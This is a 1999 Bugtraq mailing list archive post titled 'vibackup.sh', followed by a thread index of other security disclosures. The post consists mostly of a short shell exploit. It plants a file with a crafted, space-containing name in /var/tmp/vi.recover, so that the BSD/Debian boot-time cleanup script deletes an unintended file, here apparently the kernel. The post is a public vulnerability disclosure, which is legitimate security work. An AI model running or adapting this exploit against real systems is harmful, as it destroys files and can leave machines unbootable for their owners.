Bugtraq mailing list archives

vibackup.sh

From: loneguard () CRAZYMONKEY ORG (Loneguard)
Date: Fri, 31 Dec 1999 06:32:08 -0800


Looks like someone noticed this at some point in OpenBSD. Its broken
rather than fixed ;(

#!/bin/sh
#
# vibackup.sh - Loneguard 22/05/99
# Open/FreeBSD/Debian /etc/rc script insecurely removes old vi files allowing deletion
# of files
#
touch '/var/tmp/vi.recover/vi.CrazyMonkey vmlinuz'
chmod 700 '/var/tmp/vi.recover/vi.CrazyMonkey vmlinuz'
echo Now wait for ( or cause ) a reboot...

Current thread:

Re: majordomo local exploit, (continued)
- - Re: majordomo local exploit Todd C. Miller (Dec 28)
    - AltaVista rudi carell (Dec 29)
    - Re: majordomo local exploit Taneli Huuskonen (Dec 29)
    - Re: majordomo local exploit Coolio (Dec 29)
    - Re: majordomo local exploit Henrik Edlund (Dec 29)
    - bna,sh Loneguard (Dec 30)
    - Re: majordomo local exploit Andrew Brown (Dec 30)
    - Re: majordomo local exploit Henrik Nordstrom (Dec 30)
    - Fix for HP-UX automountd/autofs exploit (fwd) Doug Siebert (Dec 30)
    - Re: Fix for HP-UX automountd/autofs exploit (fwd) LaMont Jones (Dec 31)
    - vibackup.sh Loneguard (Dec 31)
    - More info on MS99-061 (IIS escape character vulnerability) .rain.forest.puppy. (Dec 29)
    - Follow UP AltaVista rudi carell (Dec 30)
    - Re: majordomo local exploit Brock Sides (Dec 29)
  - CERT Advisory CA-99-17 Denial-of-Service Tools Aleph One (Dec 29)
  - Re: majordomo local exploit Christopher X. Candreva (Dec 29)
  - The "Mac DoS Attack," a Scheme for Blocking Internet Connections John Copeland (Dec 29)
    - Re: The "Mac DoS Attack," a Scheme for Blocking Internet Connections Alan Cox (Dec 29)
  - Re: majordomo local exploit Olaf Kirch (Dec 29)
  - Re: majordomo local exploit Spidey (Dec 29)
  - Fwd: Sun Security Bulletin #00192 Bryan Blackburn (Dec 29)